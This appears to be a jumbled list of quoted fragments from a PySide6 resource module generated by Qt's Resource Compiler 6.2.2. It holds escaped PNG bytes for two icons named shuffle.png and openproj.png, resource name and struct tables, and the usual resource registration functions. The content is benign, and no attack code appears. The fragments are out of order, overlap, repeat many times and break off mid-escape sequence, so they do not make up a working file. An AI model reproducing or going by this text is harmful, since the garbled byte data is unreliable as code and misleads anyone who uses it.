",$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\",
"\\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\",
"\\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\",
"[\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\",
"\\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\",
"Qt version 6.2.2 # WARNING! All changes made in this file will be",
"\\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\",
"\\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\",
"from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe",
"b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\",
"Resource object code (Python 3) # Created by: object code # Created by:",
"G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\",
"\\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\",
";\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\",
"\\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ \\xa1\\xd4\\x0f\\xf0]QH\\xc2\\x95\\xb4\\xafh|\\xdf\\xd7\\x04\\ %\\xa5\\xc3\\xab\\xe7\\xab\\x02\\x86\\xc2\\xe2\\xd0\\x17\\xd5\\xc6:N\\ \\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\",
"\\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\",
"Resource Compiler for Qt version 6.2.2 # WARNING! All changes made in this",
"# Created by: The Resource Compiler for Qt version 6.2.2 # WARNING! All",
"\\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\",
"\\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct",
"\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\",
"\\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\",
"`\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\",
"def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) qInitResources()",
"\\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03,",
"\" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data) def qCleanupResources(): QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)",
"\\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\",
"file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\ \\x89\\",
"A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\ PNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\ \\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x06\\x00\\x00\\x00\\x1f\\xf3\\xffa\\ \\x00\\x00\\x00\\x19tEXtSoftware\\ \\x00Adobe ImageRead\\ yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\",
"\\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\",
"\\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\",
"\\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct =",
"All changes made in this file will be lost! from PySide6 import QtCore",
"\\xb43J\\xd2x\\xf7\\x0b\\xe8K\\x18\\x01\\x85\\x97YX\\x11\\ !\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\",
"K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\",
"this file will be lost! from PySide6 import QtCore qt_resource_data = b\"\\ \\x00\\x00\\x03m\\",
"# WARNING! All changes made in this file will be lost! from PySide6",
"\\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\",
